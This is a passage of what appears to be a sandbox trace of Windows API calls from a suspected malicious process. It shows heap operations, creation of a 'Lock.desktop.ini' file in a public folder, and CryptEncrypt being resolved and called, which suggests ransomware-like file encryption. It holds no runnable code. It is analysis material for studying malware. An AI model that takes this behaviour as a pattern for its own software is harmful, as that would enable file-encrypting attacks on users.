(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0269.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0269.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0269.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0269.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0269.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0269.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0269.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0269.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0269.356] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos/" (normalized: "c:\\users\\public\\videos")) returned 0x11 [0269.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0269.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0269.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0269.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0269.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0269.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0269.357] CreateFileW (lpFileName="C:\\Users\\Public\\Videos/Lock.desktop.ini" (normalized: "c:\\users\\public\\videos\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0269.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0269.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0269.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0269.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0269.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0269.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0269.359] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0269.359] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.359] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0269.359] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0269.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0269.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0269.363] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0269.363] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x17c, lpOverlapped=0x0) returned 1 [0269.365] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0269.367] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0269.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0269.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0269.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0269.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0269.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c) returned 0x978318 [0269.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0269.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.368] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0269.368] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.368] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.368] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.368] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.368] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.368] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.368] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0269.368] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.369] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0269.369] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.369] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0269.369] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.369] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.369] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.370] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.370] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0269.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e52480, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0269.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52480 | out: hHeap=0x970000) returned 1 [0269.370] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0269.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52228 | out: hHeap=0x970000) returned 1 [0269.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.371] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x17c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x180) returned 1 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e524b0 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e522a0 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523f0 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0269.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523f0 | out: hHeap=0x970000) returned 1 [0269.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e522a0 | out: hHeap=0x970000) returned 1 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e522e8 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52300 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52270 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0269.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52270 | out: hHeap=0x970000) returned 1 [0269.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52300 | out: hHeap=0x970000) returned 1 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52348 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52300 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52240 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52240 | out: hHeap=0x970000) returned 1 [0269.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52300 | out: hHeap=0x970000) returned 1 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52408 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523c0 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523a8 [0269.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0269.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523a8 | out: hHeap=0x970000) returned 1 [0269.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523c0 | out: hHeap=0x970000) returned 1 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521e0 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e522a0 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52450 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0269.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52450 | out: hHeap=0x970000) returned 1 [0269.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e522a0 | out: hHeap=0x970000) returned 1 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52420 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e522a0 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52438 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52438 | out: hHeap=0x970000) returned 1 [0269.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e522a0 | out: hHeap=0x970000) returned 1 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52258 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52438 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52300 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0269.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52300 | out: hHeap=0x970000) returned 1 [0269.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52438 | out: hHeap=0x970000) returned 1 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52300 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e523a8 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52480 [0269.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52480 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523a8 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e523d8 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52078 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52180 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fe8 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52090 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52030 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f28 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f40 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0269.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52318 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e522d0 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52390 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9787b0 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52108 | out: hHeap=0x970000) returned 1 [0269.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0269.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0269.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0269.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0269.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0269.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0269.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0269.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0269.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0269.375] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52180 [0269.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0269.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0269.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0269.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0269.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521b0 [0269.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0269.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0269.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0269.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0269.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 